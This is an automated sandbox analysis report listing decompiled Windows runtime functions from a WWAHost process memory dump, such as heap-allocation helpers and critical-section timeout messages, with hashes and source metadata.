                                              • Instruction ID: 30531c42d4b14c81a10228ce45b23db55ba3494d0a8f5e8df4c1966d8f9312aa
                                              • Opcode Fuzzy Hash: 6abb4f79e7a4d321a6585002d27eae75ad4931f78dc90dc701ee6a6222d10cf3
                                              • Instruction Fuzzy Hash: 94D05E615611046AC72DF758DA54B266216E7C6B14F30484FE1074EAF4DBA8D8D6D228
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039816E0 Relevance: .0, Instructions: 17COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E039816E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03981710(0x3a467e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03974620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                              0x039816e8
                                              0x039816ef
                                              0x039816f3
                                              0x039816fe
                                              0x00000000
                                              0x03981700
                                              0x0398170d
                                              0x0398170d
                                              0x039816f2
                                              0x039816f2
                                              0x039816f2
                                              0x039816f2

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 135348aa4876f0a20e88e48718cd9530001e33615f30f7d199460d8565e523c3
                                              • Instruction ID: 501dd8d4705acb8ba5561c7b5be3a59df83b2f4480778e2cda2f406940f011fa
                                              • Opcode Fuzzy Hash: 135348aa4876f0a20e88e48718cd9530001e33615f30f7d199460d8565e523c3
                                              • Instruction Fuzzy Hash: 04D0A932200200A2DA2DFF159804B14225AEBC0BC1F3C006CF20B4D8D1CFA0CCA3E058
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D53CA Relevance: .0, Instructions: 16COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E039D53CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0396EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                              0x039d53ca
                                              0x039d53ce
                                              0x039d53d9
                                              0x039d53de
                                              0x039d53e1
                                              0x039d53e1
                                              0x039d53e6
                                              0x039d53f3
                                              0x00000000
                                              0x039d53f8
                                              0x039d53fb

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                              • Instruction ID: 75c84b75561d841e40f093a078870c7209160f13afdb6d3efa94dbf35c2fe0ea
                                              • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                              • Instruction Fuzzy Hash: 80E08C35900780DBCF12DB99CA50F5EF7F9FB85B40F194408A0085FA60C734AC00CB00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0396AAB0 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0396AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                              0x0396aab6
                                              0x0396aabb
                                              0x039ba442
                                              0x00000000
                                              0x039ba448
                                              0x039ba454
                                              0x039ba454
                                              0x0396aac1
                                              0x0396aac1
                                              0x0396aac6
                                              0x0396aac6

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                              • Instruction ID: b34f87a0e9202d806d26eaad5ff96c64570e08d91d9f7ad949b4c8ce5cb59467
                                              • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                              • Instruction Fuzzy Hash: 97D0E975352980CFD616CB1DC954B5573BDBB44B84FC904E0E501CB761E62CD944CA10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039835A1 Relevance: .0, Instructions: 12COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E039835A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E0396EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                              0x039835a1
                                              0x039835a1
                                              0x039835a5
                                              0x039835ab
                                              0x039835ab
                                              0x039835b5
                                              0x00000000
                                              0x039835c1
                                              0x039835b7

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                              • Instruction ID: 99ff89e7e9aa05a492e5ed4f490ebc5a2edb43f0f9ca2edc8ecf947b17396319
                                              • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                              • Instruction Fuzzy Hash: 43D0A73D40318099DB03FB10C2947687375BB80A44F5C1455800905451C33E4909C700
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395DB40 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0395DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03974620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                              0x0395db4d
                                              0x0395db54
                                              0x0395db5f
                                              0x0395db56
                                              0x0395db56
                                              0x0395db5c
                                              0x0395db5c

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                              • Instruction ID: 251e932cfb810001daf60ce5838b99be0afb57d27268a902edd4990fe4d63292
                                              • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                              • Instruction Fuzzy Hash: B8C08C30380B01AAEB32AF20CD01B0076A5BB40B41F4800A07700DA0F0EB78D801E600
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039DA537 Relevance: .0, Instructions: 11COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E039DA537(intOrPtr _a4, intOrPtr _a8) {

				return L03978E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                              0x039da553

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                              • Instruction ID: 784220153ae60e674d184d8f85fe7b1d2030b7a3a56ffdb2e88efdf6580f07b1
                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                              • Instruction Fuzzy Hash: 79C01236080248BBCB12AE81CC01F067B2AEB94B60F108010BA080A5A08632E970EA84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03973A1C Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03973A1C(intOrPtr _a4) {
				void* _t5;

				return L03974620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                              0x03973a35

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                              • Instruction ID: 29ecdd1581dae24c089b8ac57614f789395c3b78a044a2dc266b6793d66712c6
                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                              • Instruction Fuzzy Hash: F9C04C36180648BBC722BE46DD01F157B69E794B60F154021B6040A5A18576ED61D598
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039836CC Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E039836CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                              0x039836d2
                                              0x039836e8
                                              0x039836d4
                                              0x039836e5
                                              0x039836e5

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                              • Instruction ID: 7d2d300fc03b84427f750a97292f998222f124d3ad5fee4d5da0fec76509feff
                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                              • Instruction Fuzzy Hash: FAC04C79255540BAD625BF248D51B157258A780A61F6806547221495E1D569AC00D504
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039676E2 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E039676E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                              0x039676e4
                                              0x00000000
                                              0x039676f8
                                              0x039676fd

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                              • Instruction ID: 219f94d55a6d182cd2d4301ab4b1540f41813092bd176e395fe572649b0f8cfe
                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                              • Instruction Fuzzy Hash: 9DC08C741422805AEB2AE788CE20B303659AB0864DF6C099CAA010D4E1C37CA803C208
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0395AD30 Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0395AD30(intOrPtr _a4) {

				return L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                              0x0395ad49

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                              • Instruction ID: 1ee2cda48fcba44caa8602e3082f10248de416c1a145620e10fb52abf99819c7
                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                              • Instruction Fuzzy Hash: 64C08C32080248BBC712AA89CD00F117B29E790B60F000020B6040A6A1C932E861D588
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03977D50 Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03977D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                              0x03977d56
                                              0x03977d5b
                                              0x03977d60
                                              0x03977d5d
                                              0x03977d5d
                                              0x03977d5d

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                              • Instruction ID: dca8a7fc7ca6b3d87f2898d34f551417040cf17e15e8a8563a899a24058eaa58
                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                              • Instruction Fuzzy Hash: 34B092353019408FCE16DF18C080B2533E8BB48A80B8800D0E400CBA20D229E8008900
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03982ACB Relevance: .0, Instructions: 5COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03982ACB() {
				void* _t5;

				return E0396EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                              0x03982adc

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                              • Instruction ID: dd913b8738df379d550918fb511d7b9837e6ca0212a179681fdb8d3abab19e3e
                                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                              • Instruction Fuzzy Hash: D6B01236C12541CFCF02EF50C710B197331FB40750F05449490012B930C229AC01CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039EFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E039EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0399CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E039E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E039E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x039efdda
                                              0x039efde2
                                              0x039efde5
                                              0x039efdec
                                              0x039efdfa
                                              0x039efdff
                                              0x039efe0a
                                              0x039efe0f
                                              0x039efe17
                                              0x039efe1e
                                              0x039efe19
                                              0x039efe19
                                              0x039efe19
                                              0x039efe20
                                              0x039efe21
                                              0x039efe22
                                              0x039efe25
                                              0x039efe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 039EFDFA
                                              Strings
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 039EFE01
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 039EFE2B
                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 4ec4c24587ce698b841bd256a7e14dc1daeb2ed171c8783a1a2d9ff2967b1992
                                              • Instruction ID: 25f7bce81bb50ea4dc39abee73a47c188d271aba8b9874b8c7af97a5a889d37c
                                              • Opcode Fuzzy Hash: 4ec4c24587ce698b841bd256a7e14dc1daeb2ed171c8783a1a2d9ff2967b1992
                                              • Instruction Fuzzy Hash: C5F0F676200201BFEA219A89DC02F23BB5AEB85730F154319F6685A1D1DA63FC30D6F0
                                              Uniqueness

                                              Uniqueness Score: -1.00%